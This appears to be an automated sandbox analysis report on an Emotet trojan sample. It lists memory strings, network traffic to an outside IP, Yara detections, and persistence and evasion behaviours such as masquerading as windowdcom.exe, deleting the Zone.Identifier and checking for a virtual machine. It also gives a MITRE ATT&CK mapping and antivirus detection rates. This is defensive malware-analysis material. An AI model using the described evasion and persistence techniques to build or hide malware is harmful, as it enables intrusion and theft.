                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                    Source: svchost.exe, 0000001B.00000003.813436216.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfxL
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                    Source: svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfje
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/retention.srf
                    Source: svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                    Source: svchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf256
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813609882.00000148F1331000.00000004.00000001.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                    Source: svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.308009587.0000020842013000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.307787079.0000020842045000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.307787079.0000020842045000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                    Source: windowdcom.exe, 00000003.00000003.278462097.0000000000BB2000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemet43/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownHTTPS traffic detected: 167.114.153.153:443 -> 192.168.2.3:49744 version: TLS 1.2

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: yxghUyIGb4.exe, type: SAMPLE
                    Source: Yara matchFile source: 00000001.00000000.196238760.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.202814564.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1275643184.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.203168982.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.195274651.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.196554240.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.201989781.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.203523658.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 2.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90Jump to dropped file

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: yxghUyIGb4.exe, type: SAMPLEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 2.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 1.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 0.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 3.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 3.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 0.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 1.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 2.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: C:\Windows\SysWOW64\windowdcom.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeFile deleted: C:\Windows\SysWOW64\windowdcom.exe:Zone.IdentifierJump to behavior
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeCode function: 0_2_008277F0
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeCode function: 0_2_00826E70
                    Source: yxghUyIGb4.exe, 00000001.00000002.203555324.0000000000920000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs yxghUyIGb4.exe
                    Source: yxghUyIGb4.exe, 00000001.00000002.203590206.0000000000980000.00000002.00000001.sdmpBinary or memory string: originalfilename vs yxghUyIGb4.exe
                    Source: yxghUyIGb4.exe, 00000001.00000002.203590206.0000000000980000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs yxghUyIGb4.exe
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeSection loaded: cldapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                    Source: yxghUyIGb4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: yxghUyIGb4.exe, type: SAMPLEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 2.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 1.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 3.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 3.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 1.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 2.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: classification engineClassification label: mal96.troj.evad.winEXE@17/8@0/13
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeCode function: 0_2_00822110 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
                    Source: C:\Windows\SysWOW64\windowdcom.exeMutant created: \BaseNamedObjects\M82F5233F
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2132:120:WilError_01
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M6A9F2F98
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I6A9F2F98
                    Source: C:\Windows\SysWOW64\windowdcom.exeMutant created: \BaseNamedObjects\Global\I6A9F2F98
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeMutant created: \Sessions\1\BaseNamedObjects\M3273981E
                    Source: yxghUyIGb4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: yxghUyIGb4.exeVirustotal: Detection: 83%
                    Source: yxghUyIGb4.exeReversingLabs: Detection: 96%
                    Source: unknownProcess created: C:\Users\user\Desktop\yxghUyIGb4.exe 'C:\Users\user\Desktop\yxghUyIGb4.exe'
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeProcess created: C:\Users\user\Desktop\yxghUyIGb4.exe C:\Users\user\Desktop\yxghUyIGb4.exe
                    Source: unknownProcess created: C:\Windows\SysWOW64\windowdcom.exe C:\Windows\SysWOW64\windowdcom.exe
                    Source: C:\Windows\SysWOW64\windowdcom.exeProcess created: C:\Windows\SysWOW64\windowdcom.exe C:\Windows\SysWOW64\windowdcom.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeProcess created: C:\Users\user\Desktop\yxghUyIGb4.exe C:\Users\user\Desktop\yxghUyIGb4.exe
                    Source: C:\Windows\SysWOW64\windowdcom.exeProcess created: C:\Windows\SysWOW64\windowdcom.exe C:\Windows\SysWOW64\windowdcom.exe
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: yxghUyIGb4.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeCode function: 0_2_00821F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

                    Persistence and Installation Behavior:

                    barindex
                    Creates files in the system32 config directoryShow sources
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90Jump to behavior
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90Jump to behavior
                    Drops executables to the windows directory (C:\Windows) and starts themShow sources
                    Source: C:\Windows\SysWOW64\windowdcom.exeExecutable created and started: C:\Windows\SysWOW64\windowdcom.exe
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exePE file moved: C:\Windows\SysWOW64\windowdcom.exeJump to behavior

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeFile opened: C:\Windows\SysWOW64\windowdcom.exe:Zone.Identifier read attributes | delete

                    Malware Analysis System Evasion:

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)Show sources
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeAPI coverage: 6.5 %
                    Source: C:\Windows\System32\svchost.exe TID: 5756Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5520Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5512Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 3512Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeFile Volume queried: C:\ FullSizeInformation
                    Source: svchost.exe, 00000007.00000002.1276322459.000002544E470000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.1211147628.00000148F1740000.00000002.00000001.sdmp, svchost.exe, 0000001D.00000002.961294020.0000021C5F200000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: svchost.exe, 0000001D.00000003.830542579.0000021C5E877000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWthernet0-WFP Native MAC Layer LightWeight Filter-0000
                    Source: svchost.exe, 00000006.00000002.598463066.0000013C68662000.00000004.00000001.sdmpBinary or memory string: (@Hyper-V RAW
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmp, svchost.exe, 00000006.00000002.598444612.0000013C6864C000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210384278.00000148F0CD6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.960845120.0000021C5E8D8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000007.00000002.1276322459.000002544E470000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.1211147628.00000148F1740000.00000002.00000001.sdmp, svchost.exe, 0000001D.00000002.961294020.0000021C5F200000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: svchost.exe, 00000007.00000002.1276322459.000002544E470000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.1211147628.00000148F1740000.00000002.00000001.sdmp, svchost.exe, 0000001D.00000002.961294020.0000021C5F200000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: svchost.exe, 00000006.00000002.597641934.0000013C62E29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@Qfh<
                    Source: svchost.exe, 0000001D.00000002.960698859.0000021C5E851000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
                    Source: svchost.exe, 00000007.00000002.1275992364.000002544DE67000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.928580769.00000229D7229000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000007.00000002.1276322459.000002544E470000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.1211147628.00000148F1740000.00000002.00000001.sdmp, svchost.exe, 0000001D.00000002.961294020.0000021C5F200000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Windows\SysWOW64\windowdcom.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeCode function: 0_2_00821F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeCode function: 0_2_00821BE0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeCode function: 0_2_008215B0 GetModuleFileNameW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateEventW,CreateMutexW,CloseHandle,GetLastError,SetEvent,CloseHandle,CloseHandle,memset,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\windowdcom.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exeCode function: 0_2_00828D50 RtlGetVersion,GetNativeSystemInfo,
                    Source: C:\Windows\SysWOW64\windowdcom.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    barindex
                    Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                    Source: svchost.exe, 0000001D.00000003.830852068.0000021C5F1FC000.00000004.00000001.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
                    Source: svchost.exe, 0000000B.00000002.1275789085.00000232F8302000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: yxghUyIGb4.exe, type: SAMPLE
                    Source: Yara matchFile source: 00000001.00000000.196238760.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.202814564.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1275643184.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.203168982.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.195274651.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.196554240.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.201989781.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.203523658.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 2.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection1Masquerading22OS Credential DumpingSecurity Software Discovery51Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsNative API11Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery24VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    yxghUyIGb4.exe83%VirustotalBrowse
                    yxghUyIGb4.exe97%ReversingLabsWin32.Trojan.Emotet
                    yxghUyIGb4.exe100%AviraTR/Crypt.XPACK.Gen
                    yxghUyIGb4.exe100%Joe Sandbox ML

